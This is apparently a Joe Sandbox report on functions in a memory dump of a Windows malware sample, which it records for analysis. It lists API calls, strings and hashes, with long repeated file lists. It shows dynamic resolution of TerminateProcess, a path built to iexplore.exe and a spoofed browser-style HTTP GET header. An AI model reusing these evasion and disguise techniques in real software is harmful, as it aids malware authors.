Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction ID: ced304d001c2525b7cac575f73587a46ed6eb601c29202d9e8bda7fb17f98e7e
Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction Fuzzy Hash: 94116DB110060ABBEB251B20CC5AFFB7A2DEF84B10F004519FA0699080DBF59E519AA8

Function 00403FB1 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100threadCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00404050
ExitThread.KERNEL32 ref: 004040E7

Strings

[@, xrefs: 00404002
8@, xrefs: 00403FEC

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CountExitThreadTick
String ID: 8@$[@
API String ID: 2794094058-2583875052
Opcode ID: ff3c58b0bdba37a238cd5a4d168293157beaed9c7ed117d7eea0098dd14a9af2
Instruction ID: 469505ee80aad82e613372910616f7cc737cc72fb2d144b40eece11ab5930af1
Opcode Fuzzy Hash: ff3c58b0bdba37a238cd5a4d168293157beaed9c7ed117d7eea0098dd14a9af2
Instruction Fuzzy Hash: BF31C2715043409BE320EB14DC09B9BB7A5AB84715F04493EF789BB2D1D675A5088B9B

Function 0040499D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005,?,00000000), ref: 00404A80
ExitThread.KERNEL32 ref: 00404A8D

Strings

GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 00404A2E
<6@, xrefs: 004049E2

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: ExitSleepThread
String ID: <6@$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo
API String ID: 2532117645-2365876256
Opcode ID: c3d47d769dcbd41a8f4167cd28f1adef2b6d86539016551bb7ef57a848531342
Instruction ID: e6dcf0b5b1e536148edb8c7bcee7a6828d1d94e54290116fa950f8d1a6053691
Opcode Fuzzy Hash: c3d47d769dcbd41a8f4167cd28f1adef2b6d86539016551bb7ef57a848531342
Instruction Fuzzy Hash: 0E21A572144344AFD324DB24DD45FEB73A8EF85315F00493DF685A2281EF7565098BAB

Function 00401820 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,ProcessTrans), ref: 0040182F

Strings

ProcessTrans, xrefs: 00401829
<6@, xrefs: 00401896
%u.%u.%u.%u, xrefs: 00401890

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: %u.%u.%u.%u$<6@$ProcessTrans
API String ID: 190572456-2997530932
Opcode ID: 923ab22f828fa07c49138cca62a50a6aac9a6e92c9ae45124c644abfdc677477
Instruction ID: 3a4176f581b1380518edbe1a1b49e1bd09d6b00a217a4bcfab538be4d270b979
Opcode Fuzzy Hash: 923ab22f828fa07c49138cca62a50a6aac9a6e92c9ae45124c644abfdc677477
Instruction Fuzzy Hash: E901A172414302AFD314DB24CD85E7B77A8EFC4704F048A3CF895A62D0DB78D9088B9A

Function 00403C10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00403C20
lstrcatA.KERNEL32(?,\Program Files\Internet Explorer\iexplore.exe,?,00000104), ref: 00403C35
lstrcpyA.KERNEL32(?,?,?,\Program Files\Internet Explorer\iexplore.exe,?,00000104), ref: 00403C48

Strings

\Program Files\Internet Explorer\iexplore.exe, xrefs: 00403C2A

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: DirectorySystemlstrcatlstrcpy
String ID: \Program Files\Internet Explorer\iexplore.exe
API String ID: 2630975639-1907246925
Opcode ID: 9d610355a3853537af27de88a3b84bfec3623b09a142c4852019a6b4888a0da7
Instruction ID: 58d9aff6231955fab03da148272387ac6a18f6e7ddf61f3ccb84cd9a8b5690bb
Opcode Fuzzy Hash: 9d610355a3853537af27de88a3b84bfec3623b09a142c4852019a6b4888a0da7
Instruction Fuzzy Hash: 4FE086F4548340ABD710D754D948FAA77A4BB94305F45882CB5CDD2190D6B8809CC71A

Function 004044FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,TerminateProcess), ref: 0040451A
GetProcAddress.KERNEL32(00000000), ref: 00404521

Strings

TerminateProcess, xrefs: 00404510
kernel32.dll, xrefs: 00404515

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: TerminateProcess$kernel32.dll
API String ID: 2574300362-189552057
Opcode ID: 6f636aeb74e389af04e2a293c086324e8f42b9283dc5f0b57c6f061e2f8a9beb
Instruction ID: 033c7f9598048c8c3c56f6b884b3fb58df83f6f11900fedc1394fc5852d01883
Opcode Fuzzy Hash: 6f636aeb74e389af04e2a293c086324e8f42b9283dc5f0b57c6f061e2f8a9beb
Instruction Fuzzy Hash: 78C012B2681300AAC2806BA0BE08A643710A285A2A320103BF602B00E0CA3A00208B2D

Function 004012D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,SizeofResource), ref: 004012EA
GetProcAddress.KERNEL32(00000000), ref: 004012F1

Strings

kernel32.dll, xrefs: 004012E5
SizeofResource, xrefs: 004012E0

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
